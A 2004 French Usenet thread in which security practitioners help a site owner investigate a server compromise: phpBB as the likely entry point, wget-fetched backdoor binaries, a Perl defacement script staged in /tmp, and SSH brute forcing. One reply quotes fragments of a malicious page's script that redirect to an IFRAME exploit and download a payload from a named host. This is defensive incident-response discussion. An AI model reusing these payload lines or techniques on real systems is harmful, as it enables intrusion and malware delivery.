>> d'un serveur , c'est pas du tout mon domaine donc j'ai un peu fait
>> comme j'ai pu :/
>
> Toi, tu t'occupes de ton domaine. Par contre, ton hébergeur, lui,
> s'occupe de la classe d'IP, et il peut associer à ton IP un nom pour
> qu'on puisse faire une requête DNS sur l'IP. c'est ça un
> enregistrement inverse (reverse DNS). Tu dois lui demander de le
> mettre en place.

ils vont pas me faire payer ?


>
>> ok , c'est vrai qu'il faudrait que je mette à jour :(
>
> Bah ouais...

j'ai mis à jour phpbb en attendant ...

>
>> bizarrement , les logs sont tres etrange , on dirait que la personne
>> avait directement accé au serveur , cette personne a balancé ses wget
>> sans probleme ( plus de 100 ) et sans qu'apache ne detecte aucune
>> erreur , le premier wget est apparu comme ça à 23h47. petite
>> question : est
>> ce qu'une commande wget balancée en ssh avec accé root se retrouve
>> dans le error_log ?
>
> Ton mec a réussi à chopper un shell root sur ta machine, c'est un
> fait. La question est de savoir comment. Donc tu dois regarder tes
> logs sur les heures précédents ces premières traces.

vi je vais analyser ca demain , y a 45 mo de logs , je sent que ca va etre
long , en plus pour peu qu'il s'y soit pris sur plusieurs jours ...

> Si le mec est passé par ton phpBB, Apache n'y verra rien à redire.

ok

> Cherche un peu sur ta machine la trace de scripts PHP bizarres (genre
> qui contiennent un appel de system() par exemple) et des binaires qui
> ne sont clairement pas à toi ("nc" par exemple).

le fichier perl déja ( listé dans une autre contrib )
j'ai aussi une centaine de fichier cd.1 cd.x (où x est un nombre de 1 à
100et+ ) , je n'arrive pas du tout à savoir à quoi ca peut correspondre ,
les fichiers font tous 950ko , ils ont été téléchargé pendant l'attaque
depuis un site web anglais qui vends des produits d'equitation , j'en ai
téléchargé un sur mon dur et j'ai tout supprimé , la visualisation du
fichier n'apporte aucune info exploitable ( par moi en tout cas :p )

Je ne peux pas
> prédire ce qui a été fait, mais le fait d'uploader un binaire et un
> script PHP pour le lancer est classique.

vi.

> Regarde aussi du côté des connexions SSH (auth.log), il y a des
> attaques par dictionnaire qui tournent en ce moment. Si ton mot de
> passe root est un peu faible, ou qu'un compte classique avec mot de
> passe faible ou par défaut est présent, il est peut-être passé par là.

oui j'ai souvent des petites attaques en ssh , mais souvent des choses assez
faibles ( du genre user toto pass toto ) donc je n'y ai pas prété attention
... j'aurais peut etre du ...

> Ce que tu dois comprendre, c'est qu'une fois qu'il aura un accès
> shell à ta machine, le pas à faire pour passer root n'est plus très
> fort, surtout si ton kernel n'est pas à jour (nombreux local root via
> le kernel sous Linux).

ok.

>
>>> http://www.xaero-method.com/info
>>> Surtout vu la configuration que ça affiche...
>> je le concede :/
>
> C'est un grand classique.

surtout que dans le fichier perl , la variable unix=1 donc le mec s'est bien
renseigné avant et n'a pas réglé son script pour windows , enfin j'ai viré
le fichier ;)

merci pour ces contributions , j'y vois deja un peu plus clair ;)

Cedric Blancher

unread,
Nov 30, 2004, 12:18:20 PM11/30/04
to
Le Tue, 30 Nov 2004 17:10:34 +0000, Xaero a écrit :
[Reverse DNS]

> ils vont pas me faire payer ?

No se, il faut demander.

> vi je vais analyser ca demain , y a 45 mo de logs , je sent que ca va etre
> long , en plus pour peu qu'il s'y soit pris sur plusieurs jours ...

Ouais, je pense que tu vas y mettre du temps, sans parler de tous les
binaires qu'il a déposé sur ta machine...

> le fichier perl déja ( listé dans une autre contrib ) j'ai aussi une
> centaine de fichier cd.1 cd.x (où x est un nombre de 1 à 100et+ ) , je
> n'arrive pas du tout à savoir à quoi ca peut correspondre ,

Archive-les, ça peut servir :)

> les fichiers font tous 950ko , ils ont été téléchargé pendant l'attaque
> depuis un site web anglais qui vends des produits d'equitation , j'en ai
> téléchargé un sur mon dur et j'ai tout supprimé , la visualisation
> du fichier n'apporte aucune info exploitable ( par moi en tout cas :p )

À priori, ce sont tous le même binaire cd (cf. autre contrib) qui est
une pauvre backdoor. Le binaire est gros parce que compilé en statique.

Si tu as besoin d'aide, n'hésite pas à me contacter directement, j'ai
déjà commencer l'analyse de ce que tu as filé avec des collègues :)


--
Créer une hiérarchie supplementaire pour remedier à un problème (?) de
dispersion est d'une logique digne des Shadocks.
* BT in: Guide du Cabaliste Usenet - La Cabale vote oui (les Shadocks aussi) *

Cedric Blancher

unread,
Nov 30, 2004, 12:25:44 PM11/30/04
to
Le Tue, 30 Nov 2004 17:10:34 +0000, Xaero a écrit :
> en fait je lance ma session ssh et j'utilise la commande ftp ? ou il faut
> installer qqe chose ?

Il y a un poil de configuration pour activer le support du sftp côté
serveur (cf. la documentation, directive subsystem). Après, tu lances
"sftp mon_serveur" et hop, ils connecte au SSH en face et tu peux jouer
comme avec un client FTP en ligne de commande.
Il existe des clients SFTP graphiques (même pour Windows) et certains
clients FTP supportent le SFTP (FileZilla par exemple si ma mémoire est
bonne).

> j'ai deja utilisé la commande ftp mais uniquement pour me connecter à
> des serveurs ftp distant , je vois pas bien comment transferer les
> fichiers de mon dur vers mon ftp en passant par ssh :/

Voir les commandes sftp et scp.



> donc en fait à la place du port 110 , j'utilise le port 1110 , et ça
> marche avec oe ;) ?

Ouais, tu mets 127.0.0.1 comme adresse et 1110 comme port et c'est bon.
Il faut bien sûr penser à lancer le SSH avant, sinon, ça va pas
marcher, hein ? ;)

> je suis pas expert en perl , mais d'aprés ce que je vois , le mec se
> sert du fait quele dossier tmp soit en 777 pour creer des copies
> temporaires des fichiers à defacer , il modifie ensuite ces fichiers
> depuis le dossier temporaire (777) et fait un mv vers les repertoires de
> destinations , du coup en theorie , il n'a pas besoin d'avoir les droits
> root pour faire ça ..

Il a juste besoin de pouvoir écraser les fichiers qu'il touche. Tout
dépend de l'UID qu'il a obtenu en entrant sur la machine, mais en
général, il n'a pas le bon. Par exemple, s'il passe par le serveur Web,
il va se retrouver en www-data (dans l'immense majorité des cas), et il
est rare que les fichiers du site web appartiennent à www-data... D'où
les droits root.

> ce qui me fait dire qu'il n'avait sans doute pas les pleins pouvoirs ,
> sinon pourquoi s'embetter , il aurait pu modifier directement les
> fichiers sources sans passer par des copies dans le repertoire tmp , non
> ?

Non, parce qu'il aurait perdu les fichiers originaux qu'il semble vouloir
conserver. Si tu veux échanger le contenu de deux verres, tu as besoin
d'un 3e récipient pour pouvoir vider le premier verre. Et c'est à que
/tmp intervient.

> n'empeche , c'est du beau boulot.

Bof... Il avait le script qui allait bien.

> finalement la question principale est : comment le script en perl a
> atteri dans le repertoire tmp, un wget sans doute , ( au fait j'ai
> consulté le error_log et les transfers des fichiers sont dedans , donc
> peut on suposer que le wget a eu lieu par le biais d'apache ? )

La question me semble plutôt être "comment le mec s'est retrouvé avec
un shell sur la machine", à supposer bien entendu qu'il en ait eu un...


--
BOFH excuse #305:

IRQ-problems with the Un-Interruptible-Power-Supply

Xaero

unread,
Nov 30, 2004, 12:31:37 PM11/30/04
to
Cedric Blancher wrote:
> Le Tue, 30 Nov 2004 17:10:34 +0000, Xaero a écrit :
> [Reverse DNS]
>> ils vont pas me faire payer ?
>
> No se, il faut demander.

je vais faire ça de ce pas ;)

>
>> vi je vais analyser ca demain , y a 45 mo de logs , je sent que ca
>> va etre long , en plus pour peu qu'il s'y soit pris sur plusieurs
>> jours ...
>
> Ouais, je pense que tu vas y mettre du temps, sans parler de tous les
> binaires qu'il a déposé sur ta machine...

chaque binaire déposé est logué avec tout le detail du transfer ( avec les
pourcentages etc ... ) , mais le pire , c'est que c'est tellement soudain ,
qu'a mon avis , la personne avait deja pénétré avant , peut etre une semaine
avant et n'avait meme plus à forcer le passage pour commettre son forfait ;)

>
>> le fichier perl déja ( listé dans une autre contrib ) j'ai aussi une
>> centaine de fichier cd.1 cd.x (où x est un nombre de 1 à 100et+ ) ,
>> je n'arrive pas du tout à savoir à quoi ca peut correspondre ,
>
> Archive-les, ça peut servir :)

surtout le fichier perl en fait , ne serais ce que pour fournir une solution
d'anti-defaçage , ca peut etre tres pratique ;)

>
>> les fichiers font tous 950ko , ils ont été téléchargé pendant
>> l'attaque depuis un site web anglais qui vends des produits
>> d'equitation , j'en ai téléchargé un sur mon dur et j'ai tout
>> supprimé , la visualisation
>> du fichier n'apporte aucune info exploitable ( par moi en tout cas
>> :p )
>
> À priori, ce sont tous le même binaire cd (cf. autre contrib) qui est
> une pauvre backdoor. Le binaire est gros parce que compilé en
> statique.

est ce que ca présente un risque pour le serveur , cette backdoor execute
t'elle qqe chose qui ecoute sur le port x ou y du serveur ? à priori je n'ai
rien remarqué d'anormal au niveau des process , mais ce que j'ai du mal à
comprendre c'est le nombre impressionant de fichier , le mec n'a vraiment
pas voulu etre discret , ou alors , il a lancé un script qui boucle le
telechargement de cd , ce qui expliquerait les .1 .2 , je me souviens que
wget ajoute automatiquement un numero qu'il incremente afin de ne pas
ecraser le fichier précédent.

>
> Si tu as besoin d'aide, n'hésite pas à me contacter directement, j'ai
> déjà commencer l'analyse de ce que tu as filé avec des collègues :)

lol ok , merci ;)

Nicob

unread,
Nov 30, 2004, 2:14:53 PM11/30/04
to
On Tue, 30 Nov 2004 11:23:56 +0000, Cedric Blancher wrote:

> Déjà, juste une remarque comme ça, ton serveur Web n'a pas de reverse
> DNS. C'est cosmétique me diras-tu, mais dans l'absolu, c'est maaaal.

Dans le cas présent, ce n'est pas le plus grave.
Malheureusement ...

> http://www.xaero-method.com/info
> http://www.xaero-method.com/mail/
> http://www.xaero-method.com/test/

J'arrive après la bataille, apparemment. En tout cas, c'est une bonne
chose que d'avoir viré/protégé ces fichiers et répertoires.


Nicob

Nicob

unread,
Nov 30, 2004, 2:14:53 PM11/30/04
to
On Tue, 30 Nov 2004 12:22:54 +0000, Cedric Blancher wrote:

> Bref, y'a du monde...

C'est les sapins de Noël qui sont un peu avance cette année :)

> Mais je reste partisan d'une intrusion via le phpBB.

Tout pareil. Ce type de criminels ne se prend pas la tête à compiler du
code et à calculer des offsets. Pour moi, c'est une faille applicative
qui a été exploitée, et phpBB est effectivement un coupable idéal.

D'ailleurs, il serait intéressant de ne pas trop "pourrir" la scène de
crime (enfin, la machine quoi) afin d'essayer de déterminer quel est le
vecteur d'entrée et quelles ont été les actions entreprises.


Nicob

Nicob

unread,
Nov 30, 2004, 5:18:10 PM11/30/04
to
On Tue, 30 Nov 2004 07:25:12 +0000, Cedric Blancher wrote:

> [...]
> {document.frames["d"].document.location="/scripts/fr.exe";}
> [...]
> oDownload.startDownload("/jsk.jsp", onDownloadDone);
> [...]

> Examiner le contenu de http://tbsoft.org/jsk.jsp me semble tout approprié.

Ne pas oublier "/scripts/fr.exe" qui est une page HTML exploitant la
faille IFRAME. Pour 'jsk.jpsp', ça ressemble à une n-ième création du
gang Dumaru, au vu des clés de registre postionnées (HKCU\Software\SARS).


Nicob

Simon Marechal

unread,
Dec 1, 2004, 7:35:29 PM12/1/04
to
Cedric Blancher wrote:
> phpBB 2.0.6 n'est pas à jour. Là encore, il y a pas mal de failles de
> sécurité corrigées dans les 2.0.7 et 2.0.8 par rapport à la 2.0.6. Je
> dois avouer que c'est amha la source probable de l'intrusion. Il faut

D'autant plus qu'il est tombé une injection de code php arbitraire le
mois dernier sur tous les 2.0.x<2.0.11 ...

0 new messages